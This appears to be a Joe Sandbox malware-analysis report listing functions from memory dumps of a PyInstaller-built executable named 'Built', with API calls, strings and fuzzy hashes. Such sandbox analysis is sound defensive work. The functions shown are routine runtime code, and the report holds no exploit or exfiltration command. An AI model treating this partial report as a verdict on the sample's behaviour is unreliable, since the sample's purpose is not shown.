Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: 74358a6a3c4ddc56717f919ded47983f850b968a7d66a014d21fbbc1527b9100
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: BB31E82566EB42C1EE15FB1AA400575A394BF88B65FD9053ADD1D57B42FF3CE0428B30

Function 00007FF76D5C2300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF76D5C2338
DialogBoxIndirectParamW.USER32 ref: 00007FF76D5C23FE
DeleteObject.GDI32 ref: 00007FF76D5C2431
DestroyIcon.USER32 ref: 00007FF76D5C2443

Strings

[oV116, xrefs: 00007FF76D5C231C
Unhandled exception in script, xrefs: 00007FF76D5C2368

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script$[oV116
API String ID: 3081866767-1141572857
Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
Instruction ID: 609efc2a4745c317c5030dfd28b771cd4af625adbb1b43f507c9b1ac438cc0d9
Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
Instruction Fuzzy Hash: 50313F7262D682C5EB20BB61E8552E9B360FB89784F840135EE4D47F56EF3CD1058724

Function 00007FF76D5C8400 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
Part of subcall function 00007FF76D5C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
Part of subcall function 00007FF76D5C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BA8
Part of subcall function 00007FF76D5C7B50: GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
Part of subcall function 00007FF76D5C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BF2
Part of subcall function 00007FF76D5C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
Part of subcall function 00007FF76D5C7B50: CloseHandle.KERNEL32 ref: 00007FF76D5C7C26

LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C848C
LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C8495

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF76D5C84A3
D:(A;;FA;;;%s), xrefs: 00007FF76D5C8477
[oV116, xrefs: 00007FF76D5C8418
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF76D5C8462
S-1-3-4, xrefs: 00007FF76D5C8441

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!$[oV116
API String ID: 6828938-1232413876
Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction ID: 4e6e39f8fb2ee8cd2591a199544433e29ff7c5248a70f14e8b0feb9204e49fda
Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction Fuzzy Hash: A1212C21A2C642C2E650BB10E4552EAA2A5FB88784FC4403AEE4D57B97EE3CD8458B70

Function 00007FF76D5C7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BA8
GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
CloseHandle.KERNEL32 ref: 00007FF76D5C7C26

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
Instruction ID: c6239d03bfcab29e8c8e1406a08318e42d2e3cc7d99674f6556714ee47cc68a3
Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
Instruction Fuzzy Hash: DC212121E1CB4382EB10BB55A44422AE7A1EB857A5F900639DE7D43ED6EF6CD4458B20

Function 00007FF76D5C2760 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C283B
MessageBoxA.USER32 ref: 00007FF76D5C284F

Strings

Error, xrefs: 00007FF76D5C282C
Error/warning (ANSI fallback), xrefs: 00007FF76D5C2843
[oV116, xrefs: 00007FF76D5C277F
%s%s: %s, xrefs: 00007FF76D5C27EC

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)$[oV116
API String ID: 1878133881-3727763148
Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction ID: 717f1ca66979865fc5c786b3c2831773d00d59b48c524b8df2ad7bfa9f92ad9f
Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction Fuzzy Hash: 3D21217263C786C1E720BB10E4517EAA364FB88784F801136EA8D13A5AEF7CD645CB64

Function 00007FF76D5E707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF76D5E70AD
GetLastError.KERNEL32 ref: 00007FF76D5E70B9
CloseHandle.KERNEL32 ref: 00007FF76D5E70D1
CreateFileW.KERNEL32 ref: 00007FF76D5E70FC
WriteConsoleW.KERNEL32 ref: 00007FF76D5E711B

Strings

CONOUT$, xrefs: 00007FF76D5E70DD

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6c067c9143ad5e9d92f9a18da1a36c34864403abf882b79d6ada97431a994f69
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: 1E118E21A2CB42C6E750BB02E844329A2A1FB8CBE5F840234EE1D87B96EF3CD504C750

Function 00007FF76D5DA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA61D
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA64A
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA65B
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA66C
SetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA687

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
Instruction ID: 02b868a37af12cb0df3e4e5ffc436b19244db83960c4533d725fe938b630bb10
Opcode Fuzzy Hash: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
Instruction Fuzzy Hash: 8A115B20E2C642C2FA647725566157AE2425F587A0F844334DC3E47EDBFE2CB4018739

Function 00007FF76D5DB8B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF76D5DB92F
WriteFile.KERNEL32 ref: 00007FF76D5DBBF7
WriteFile.KERNEL32 ref: 00007FF76D5DBC3D
GetLastError.KERNEL32 ref: 00007FF76D5DBCF3

Strings

[oV116, xrefs: 00007FF76D5DB8D5

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: [oV116
API String ID: 2718003287-247592185
Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction ID: 51eb6e5c2796886c7b9392c636550f425dff08be3fa3c59efa90b4c89deca0fa
Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction Fuzzy Hash: C7D10672B2CA81C9E710EF65D4502AC77B2FB44798B944235CE6E57F9AEE38D006C324

Function 00007FF76D5DEC9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5DED8C
_get_daylight.LIBCMT ref: 00007FF76D5DED9D
_get_daylight.LIBCMT ref: 00007FF76D5DEDAE
_isindst.LIBCMT ref: 00007FF76D5DEE79

Strings

[oV116, xrefs: 00007FF76D5DECB0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID: [oV116
API String ID: 4170891091-247592185
Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction ID: 3c9ebd213e546857d7f11909ad27d2a61cb7b56a075b9642ba21f16a124c2aad
Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction Fuzzy Hash: 27510872F18111CAEB18FF6499A16BCE7A1AB44359F900235DD2D96EE6EF38A4018720

Function 00007FF76D5D4A8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF76D5D4ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF76D5D4B21
GetLastError.KERNEL32 ref: 00007FF76D5D4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D49C4), ref: 00007FF76D5D4BFE

Strings

[oV116, xrefs: 00007FF76D5D4AA2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID: [oV116
API String ID: 2780335769-247592185
Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction ID: f51ffc6533edf02ab3b870bd225a4aa94235db5e943870c46a2de1ff293c5982
Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction Fuzzy Hash: 0B519022A28641CAFB10EF71D4613BDA3A1EB5CB98F508135DE1957A9AEF38D4818734

Function 00007FF76D5C7530 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF76D5C324C,?,?,00007FF76D5C3964), ref: 00007FF76D5C7642

Strings

%s%c, xrefs: 00007FF76D5C75B4
%.*s, xrefs: 00007FF76D5C75FB
\, xrefs: 00007FF76D5C75A7
[oV116, xrefs: 00007FF76D5C7541

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$[oV116$\
API String ID: 4241100979-3064393157
Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction ID: 34878bade6f2a169e299abda865b778c46e2aea461ab8f349b0c133f793c5391
Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction Fuzzy Hash: 1D31BA21B2DAC5C5EA21A715E4107E6A254EB94BE4F844235EE6D43FC6FF3CD2458B20

Function 00007FF76D5C25F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C2686
MessageBoxA.USER32 ref: 00007FF76D5C269A

Strings

Error, xrefs: 00007FF76D5C2677
Error/warning (ANSI fallback), xrefs: 00007FF76D5C268E
[oV116, xrefs: 00007FF76D5C260C

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)$[oV116
API String ID: 1878133881-3922459162
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 58c539b24cf601d68934e0dd18d3760c98d0f56d8f1a08c7835b8e1f7310e481
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: 63115E6263CB86C1EB20AB10E451BA9B364FB48785FD05139DE9D17A56EF3CD605CB20

Function 00007FF76D5C2870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C2906
MessageBoxA.USER32 ref: 00007FF76D5C291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF76D5C290E
[oV116, xrefs: 00007FF76D5C288C
Warning, xrefs: 00007FF76D5C28F7

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning$[oV116
API String ID: 1878133881-513610321
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: a1e3e820adbdf5d9d0056f378c3c9860ad9a4cc396f98fe983883545f52af3f1
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 00118E6263CB86C1EB20AB00E451BA9B364FB48784FD01139DE9C57A46EF3CD604CB20

Function 00007FF76D5CC330 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF76D5CC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF76D5CC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF76D5CC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF76D5CC386

Strings

[oV116, xrefs: 00007FF76D5CC33D

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID: [oV116
API String ID: 2933794660-247592185
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: f0afdc3d5d5b05beda3da0936d3a40748ff4e0c8b6a0eda82b7508a2a39b0d53
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 7D114F22B28B05C9EB00AB60E8442B973A4FB59759F440E31DE6D86BA5EF78D1548350

Function 00007FF76D5D8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF76D5D8DC5
GetProcAddress.KERNEL32 ref: 00007FF76D5D8DDB
FreeLibrary.KERNEL32 ref: 00007FF76D5D8E02

Strings

mscoree.dll, xrefs: 00007FF76D5D8DBC
CorExitProcess, xrefs: 00007FF76D5D8DD4

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 6791fe7d6ae47f2166580b93635099f42453476462a87e24ff5da961499b015b
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 77F0AF61A2C742C2EB14BB24A454379A320AF897A2FD80735CD6D4A9E5EF2CD049C720

Function 00007FFDF75F3910 Relevance: 7.6, Strings: 6, Instructions: 144COMMON

Download Yara Rule

Strings

no such index: %S, xrefs: 00007FFDF75F3966
DELETE FROM %Q.sqlite_master WHERE name=%Q AND type='index', xrefs: 00007FFDF75F3A9F
sqlite_temp_master, xrefs: 00007FFDF75F39F0
sqlite_master, xrefs: 00007FFDF75F3A0C
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped, xrefs: 00007FFDF75F399E
idx, xrefs: 00007FFDF75F3AB8

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
